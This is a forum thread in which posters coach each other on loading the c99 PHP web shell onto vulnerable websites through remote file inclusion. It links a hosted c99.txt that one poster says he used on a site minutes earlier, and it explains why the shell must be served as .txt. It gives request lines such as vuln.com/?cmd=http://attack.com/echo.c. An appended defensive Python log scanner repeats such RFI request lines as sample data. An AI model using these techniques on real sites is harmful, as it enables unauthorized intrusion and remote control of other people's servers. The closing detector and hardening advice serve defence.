c99 shell scripts
turbocharged_06 wrote: it doesn't work like a properly configured c99 shell
That is because it isn't a c99 shell, as far as I can see. Try this one: http://b0rizq.by.ru/c99.txt?&
I just used it 5 minutes ago on a site so I'm sure it works.
Good luck!
As already said. It is because the PHP code should not be parsed. Either turn off PHP for that file or name it .txt (or something else that doesn't get parsed by PHP).
The reason you need to do this is because the PHP code is being parsed on your server before being shipped to the vulnerable server, meaning you'll get a static shell instead of the actual PHP code.
WhiteAcid wrote: As already said. It is because the PHP code should not be parsed. Either turn off PHP for that file or name it .txt (or something else that doesn't get parsed by PHP).
The reason you need to do this is because the PHP code is being parsed on your server before being shipped to the vulnerable server, meaning you'll get a static shell instead of the actual PHP code.
Can you explain that one more time?
You mean I should put this
http://b0rizq.by.ru/c99.txt?&
into a file like
http://www.arabian-outlaw.com/c99.php
Because when I did that it opened the shell on my website.
Use http://b0rizq.by.ru/c99.txt in the attacks.
Here's a simpler explanation. Let's say you have a file called echo.php whose contents is: <?php echo "test"; ?>. You want to run this on vuln.com using RFI.
You host this in attack.com/echo.php and call vuln.com/?cmd=http://attack.com/echo.php
vuln.com will send a request for that file, your site (attack.com) will get the request, parse it using PHP and send back the reply. vuln.com will get the reply, which will be test and include that, which is pointless.
If you renamed the file to .txt or .c or whatever and call vuln.com/?cmd=http://attack.com/echo.c then vuln.com will send the request to attack.com which will not parse the PHP file (as it isn't a .php file). This means vuln.com will get the reply <?php echo "test"; ?>, it will then execute that code (given the right type of flaw).
Does it make more sense now?
The php code itself is useless. It's just plain text until the server has baked a working page out of it which is called parsing.
Basically what Acid is saying is that if the shell is named ".php" http://b0rizq.by.ru will first parse the code and then send it to the vulnerable page. But that's not what you want! You want the vulnerable page to do the parsing, so you can access its content. In order to accomplish this the shell needs to be a filesize which the php parser doesn't parse before the server sends it. That's why the shell needs to be a txt file.
I hope this explanation + Acid's great example are sufficient!
Good luck!
S-H
WhiteAcid wrote: Use http://b0rizq.by.ru/c99.txt in the attacks.
Here's a simpler explanation. Let's say you have a file called echo.php whose contents is: <?php echo "test"; ?>. You want to run this on vuln.com using RFI.
You host this in attack.com/echo.php and call vuln.com/?cmd=http://attack.com/echo.php
vuln.com will send a request for that file, your site (attack.com) will get the request, parse it using PHP and send back the reply. vuln.com will get the reply, which will be test and include that, which is pointless.
If you renamed the file to .txt or .c or whatever and call vuln.com/?cmd=http://attack.com/echo.c then vuln.com will send the request to attack.com which will not parse the PHP file (as it isn't a .php file). This means vuln.com will get the reply <?php echo "test"; ?>, it will then execute that code (given the right type of flaw).
Does it make more sense now?
Yes, thank you. I have previously tried that and it does process the statement. Here's a picture of what I mean.
I'll update.
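Added example, not part of the thread: a defender-side check that scans web access logs for the request shape discussed above, where a query parameter carries a remote URL that the application then includes. The log lines, host names and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line of a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# A parameter value that is itself a remote URL.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://(?P<host>[^/?#\s]+)', re.I)

# Constructed sample lines; hosts and addresses are placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2008:13:55:36 +0000] "GET /?cmd=http://attack.example/echo.c HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2008:13:55:41 +0000] "GET /index.php?page=http%3A%2F%2Fattack.example%2Fc99.txt%3F%26 HTTP/1.1" 200 9120',
    '203.0.113.9 - - [10/Oct/2008:13:56:02 +0000] "GET /?cmd=%2568ttp%253A//attack.example/echo.c HTTP/1.1" 200 512',
    '198.51.100.4 - - [10/Oct/2008:13:57:10 +0000] "GET /index.php?page=about&ref=home HTTP/1.1" 200 2048',
    '198.51.100.4 - - [10/Oct/2008:13:57:30 +0000] "GET /search?q=how+to+fix+http://errors HTTP/1.1" 200 300',
]

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %2568ttp), up to a small bound."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_rfi_attempts(log_lines):
    """Return (client, param, remote_host, has_trailing_query) per suspicious parameter."""
    hits = []
    for line in log_lines:
        req = REQUEST_RE.search(line)
        if not req:
            continue
        client = line.split()[0]
        query = urlsplit(req.group("target")).query
        # parse_qsl decodes once; fully_decode catches double encoding.
        for name, raw in parse_qsl(query, keep_blank_values=True):
            value = fully_decode(raw)
            remote = REMOTE_RE.match(value)
            if remote:
                # A '?' after the host, as in the c99.txt?& URL quoted in the thread.
                trailing = "?" in value[remote.end():]
                hits.append((client, name, remote.group("host").lower(), trailing))
    return hits

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

Parameters that legitimately carry URLs (redirect targets, for example) also match, so hits are leads to review against the application's code. On the PHP side, keeping allow_url_include set to Off and mapping the parameter to a fixed allowlist of local files removes the flaw itself.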